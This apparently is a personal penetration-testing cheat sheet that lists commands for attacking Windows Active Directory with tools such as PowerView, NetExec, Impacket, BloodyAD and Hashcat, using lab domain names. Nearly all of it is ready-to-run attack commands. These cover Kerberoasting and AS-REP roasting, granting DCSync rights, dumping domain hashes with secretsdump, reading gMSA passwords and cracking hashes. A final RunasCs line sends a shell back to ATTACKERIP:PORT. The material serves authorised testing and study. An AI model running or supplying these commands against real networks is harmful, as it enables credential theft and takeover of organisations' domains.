Commands Only Summary

πŸͺŸ = Windows, 🐧 = Linux

Active Directory

πŸͺŸ SharpView (C# Port of PowerView)

AD Enumeration tool. C# port of πŸͺŸ PowerView (Now deprecated). Same commands

Get help about a command

.\SharpView.exe Get-DomainUser -Help

Enumerate information about a specific user

.\SharpView.exe Get-DomainUser -Identity <username>

πŸͺŸ PowerView (Now deprecated)

AD Enumeration Tools

Import

Import-Module ./PowerView

Information for specific User or All users

 Get-DomainUser -Identity <username> -Domain <inlanefreight.local> | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset,lastlogontimestamp,accountexpires,admincount,userprincipalname,serviceprincipalname,useraccountcontrol

Group specific info

Get-DomainGroupMember -Identity "Domain Admins" -Recurse
Explaination

-Recurse switch tells PowerView that if it finds any groups that are part of the target group (nested group membership) to list out the members of those groups.

Enumerate domain trust mappings

Get-DomainTrustMapping

Test for local admin access on either the current machine or a remote one

Test-AdminAccess -ComputerName ACADEMY-EA-MS01

Check Kerberoasting attack possibility

Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName

πŸͺŸ BloodHound

Collect data

.\SharpHound.exe -c All --zipfilename <outputFileName>
Explaination

SharpHound.exe collector, needs to be ran from a domain joined PC.

-c: (Default: Default) Collection Methods: Container, Group, LocalGroup, GPOLocalGroup, Session, LoggedOn, ObjectProps, ACL, ComputerOnly, Trusts, Default, RDP, DCOM, DCOnly

--zipfilename: Filename for the zip

πŸͺŸ [Built-in] ActiveDirectory PowerShell Module

AD Enumeration tools

Discover Modules

Get-Module

Load ActiveDirectory Module

Import-Module ActiveDirectory

Get Domain Info

Get-ADDomain
Explaination

This will print out helpful information like the domain SID, domain functional level, any child domains, and more

List accounts that may be susceptible to a Kerberoasting attack

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

Verify domain trust relationships

Get-ADTrust -Filter *
Explaination

This cmdlet will print out any trust relationships the domain has. We can determine if they are trusts within our forest or with domains in other forests, the type of trust, the direction of the trust, and the name of the domain the relationship is with.

Group Enumeration

Get-ADGroup -Filter * | select name

Group Information

Get-ADGroup -Identity "Backup Operators"

Group Membership Listing

Get-ADGroupMember -Identity "Backup Operators"

If part of GMSA_MANAGERS Group, Set yourself as someone who can read the password

Set-ADServiceAccount -Identity "target$" -PrincipalsAllowedToRetrieveManagedPassword "yourUser"

πŸͺŸ Snaffler

Snaffler is a tool that can help us acquire credentials or other sensitive data in an Active Directory environment. Snaffler works by obtaining a list of hosts within the domain and then enumerating those hosts for shares and readable directories. Once that is done, it iterates through any directories readable by our user and hunts for files that could serve to better our position within the assessment. Snaffler requires that it be run from a domain-joined host or in a domain-user context.

Snaffler.exe -s -d inlanefreight.local -o snaffler.log -v data
Explaination

-s tells it to print results to the console.

-d specifies the domain to search within.

-o tells Snaffler to write results to a logfile.

-v option is the verbosity level.

🐧 CrackMapExec (deprecated) | NetExec (updated)

A swiss army knife for pentesting networks

Help for specific protocol

crackmapexec smb -h

Domain User Enumeration

sudo crackmapexec smb <IP> -u <username> -p <password> --users
Explaination

-u Username The user whose credentials we will use to authenticate

-p Password User's password

Target (IP or FQDN) Target host to enumerate (in our case, the Domain Controller)

--users Specifies to enumerate Domain Users

--groups Specifies to enumerate domain groups

--loggedon-users Attempts to enumerate what users are logged on to a target, if any

Domain Group Enumeration

sudo crackmapexec smb <IP> -u <username> -p <password> --groups

Logged On Users

sudo crackmapexec smb <IP> -u <user> -p <password> --loggedon-users

Share Searching

sudo crackmapexec smb <IP> -u <user> -p <password> --shares

Dig Through Share

sudo crackmapexec smb <IP> -u <user> -p <password> -M spider_plus --share '<shareName>'

When completed, CME writes the results to a JSON file located at /tmp/cme_spider_plus/<ip of host>

Password Policy

sudo crackmapexec smb <IP> --pass-pol -u <user> -p <password>

Use empty username and password for null authentication

Group Policy Password misconfiguration (GPP, usually to check if read access to SYSVOL)

sudo crackmapexec smb IP -u username -p password -M gpp_autologin

Enumerate users from RID (for when the --users command doesnt work)

sudo crackmapexec smb IP -u 'user' -p 'pass' --rid-brute | grep 'SidTypeUser'

Get GMSA passwords

sudo netexec ldap IP -u 'user' -p 'password' --gmsa

Get Group membership users

sudo netexec smb DCIP -u 'USER' -p 'PASSWORD' --groups "GROUP"

Find certificate server (ADCS)

sudo netexec ldap DCIP -u 'USER' -p 'PASSWORD' -M adcs

List Kerberoastable users

sudo netexec ldap DCIP -u USER -p PASS --kerberoasting output.txt

AS_REP version with --asreproast flag

🐧 SMBMap

SMBMap is great for enumerating SMB shares from a Linux attack host. It can be used to gather a listing of shares, permissions, and share contents if accessible.

SMBMap To Check Access

smbmap -u <user> -p <password> -d <DOMAIN> -H <IP>

Recursive List Of All Directories

smbmap -u <user> -p <password> -d <DOMAIN> -H <IP> -R 'Department Shares' --dir-only

🐧 rpcclient

Useful for enumeration with NULL sessions

Connect to anonymous session

rpcclient -U '' IP

Enumerate all users to gather the RIDs

rpcclient $> enumdomusers

User Enumeration By RID

rpcclient $> queryuser 0x457

🐧 Impacket Toolkit

Impacket is a versatile toolkit that provides us with many different ways to enumerate, interact, and exploit Windows protocols and find the information we need using Python.

Shell on target device (PSExec)

psexec.py <domain/user>:'<password>'@<IP>

Stealthier Shell on target device (wmiexec.py)

A more stealthy approach to execution on hosts than other tools, but would still likely be caught by most modern anti-virus and EDR systems.

wmiexec.py <domain/user>:'<password>'@<IP

Finding ASREProasting targets

No user specification needed

GetNPUsers -dc-ip IP -request 'htb.local/' -format hashcat

Edit DACL to get DCSync

target-dn is the LDAP format, like DC=htb,DC=local

impacket-dacledit -action 'write' -rights 'DCSync' -principal 'USER' -target-dn 'DC=HTB,DC=LOCAL' 'DOMAIN'/'USER':'PASSWORD'

DCSync attack, secretsdump

impacket-secretsdump DOMAIN/USER:PASSWORD@DCIP

🐧 Windapsearch

Windapsearch is another handy Python script we can use to enumerate users, groups, and computers from a Windows domain by utilizing LDAP queries.

Enumerate Domain Admins

python3 windapsearch.py --dc-ip <DC_IP> -u <user>@<domain> -p <password> --da

Enumerate Priviledged Users

python3 windapsearch.py --dc-ip <DC_IP> -u <user>@<domain> -p <password> -PU

🐧 Bloodhound.py

Collect data for BloodHound GUI from a Linux host

sudo bloodhound-python -u '<username>' -p '<password>' -ns <DC_IP> -d <domain> -c all --zip

NTLM Hash instead of password

(the NTLM hash needs to be preceded by the :). Use -c all or -c dconly

bloodhound-python -d DOMAIN -u 'USER' --hashes ':NTLM_HASH' -dc DC_FQDM -ns DCIP --zip -c all

🐧 ldapsearch

  • -h <host>

  • -x simple authentication (anonymous)

  • -s scope (-s base namingcontexts). Output of this goes in the -b flag content

  • -b base (-b "DC=htb,DC=local") (Basically the searching scope)

Get naming context (domain name)

ldapsearch -h IP -x -s base namingcontexts

Get anonymous info

ldapsearch -h IP -x -b "DC=TEST,DC=LOCAL"

Query for users (Object class of Person)

ldapsearch -h IP -x -b "DC=TEST,DC=LOCAL" '(objectClass=Person)'

Usually the class can be person, organizationalPerson or user

Query for users and only show username

ldapsearch -h IP -x -b "DC=TEST,DC=LOCAL" '(objectClass=Person)' sAMAccountName

(you can add more things at the end, such as sAMAccountName userPrincipalName)

$ at the end of a user account is a machine account

🐧 Evil-winrm

Connect with kerberos

impacket-getTGT DOMAIN/'USER':'PASSWORD' -dc-ip DCIP
export KRB5CCNAME=USER.ccache
evil-winrm -i TARGETIP -r DOMAIN -k USER.ccache

🐧 πŸͺŸ Hashcat

hashcat -m 5600 <NTLM_HASH> <wordlist>

secretsdump output

cat dc_hash.txt | awk -F: '{print($1":"$4)}'
hashcat -m 1000 --user file wordlist

Find Hashcat mode

hashcat --example-hashes | grep <something> -B 2

Generate password list from rules

hashcat --force --stdout pwlist.txt -r /usr/share/hashcat/rules/best64.rule -r /usr/share/hashcat/rules/toggles.rule | sort -u

Limit length of passwords

awk 'length($0) > 7'
Rules

Cracking

/usr/share/hashcat/rules/InsidePro-PasswordsPro.rule

Password list gen

/usr/share/hashcat/rules/best64.rule
/usr/share/hashcat/rules/toggles.rule

Hashes in user:hash format to save user info

Put the hashes in a file in the user:hash format, for example for NTLM hashes then use the flag --user for automatically make hashcat discard that first column and use the rest as the hash. This allows to use --show to then recover the user of the cracked password from the potfile.

🐧 BloodyAD

Swiss army knife for AD privilege escalation

LogoGitHub - CravateRouge/bloodyAD: BloodyAD is an Active Directory Privilege Escalation FrameworkGitHub

As other tools, to use NTLM hashes on this put them in the -p password field PRECEDED by a :

Set yourself as owner

bloodyAD --host "DCIP" -d "DOMAIN" -u "YOURACCOUNT" -p ":HASH" set owner GROUP YourAccount

Get Writable

bloodyAD --host DCIP -d DOMAIN -u USER -p 'PASSWORD' get writable --detail

Add user to group (GenericAll over group)

bloodyAD --host DCIP -d DOMAIN -u USER -p 'PASSWORD' add groupMember "GROUP" USER

Add DCSync rights to user

bloodyAD --host DCIP -d DOMAIN -u USER -p 'PASSWORD' add dcsync "TARGETUSER"

Read GMSA password

ReadGMSAPassword privilege abuse

Following command uses -k for Kerberos (needs export KRB5CCNAME= to be set)

bloodyAD --host DC.FQDN.LOCAL -d "DOMAIN.LOCAL" --dc-ip DCIP -k get object 'TARGET' --attr msDS-ManagedPassword

Disable Pre Authentication

this makes the accounts vulnerable to asreproasting, requires GenericAll or other ways to control account

bloodyAD --host DC.FQDN.LOCAL -d "DOMAIN.LOCAL" --dc-ip DCIP -k add uac TARGET -f DONT_REQ_PREAUTH

Enable account

This is handy when an account is disabled but you control it through GenericAll or other write permissions

bloodyAD --host DC.FQDN.LOCAL -d "DOMAIN.LOCAL" --dc-ip DCIP -k remove uac TARGET -f ACCOUNTDISABLE

🐧 ntpdate

Useful to adjust the system clock to one of another machine. Solves problem like kerberos Clock skew too great

sudo apt install ntpdate
sudo ntpdate <IP or FQDN>

Disable NTP first:

sudo timedatectl set-ntp off

Also if in a VM, check that no option to sync the time is set on your VM software. For example on VirtualBox on a Windows Host:

cd "C:\Program Files\Oracle\VirtualBox"
.\VBoxManage.exe setextradata "Kali" "VBoxInternal/Devices/VMMDev/0/Config/GetHostTimeDisabled" 1

πŸͺŸ Mounting smb share (auth) from command line

net use K: \\IP\share /user:username password

list with

net use

πŸͺŸ Refreshing Privileges after privesc without closing and reopening

Useful in occasions when restarting the connection is more annoying than downloading a binary on the machine. Example is when assigning your own user to the administrators group

.\RunasCs.exe USER PASSWORD powershell -r ATTACKERIP:PORT
PreviousHomeNextSome other cool websites

Last updated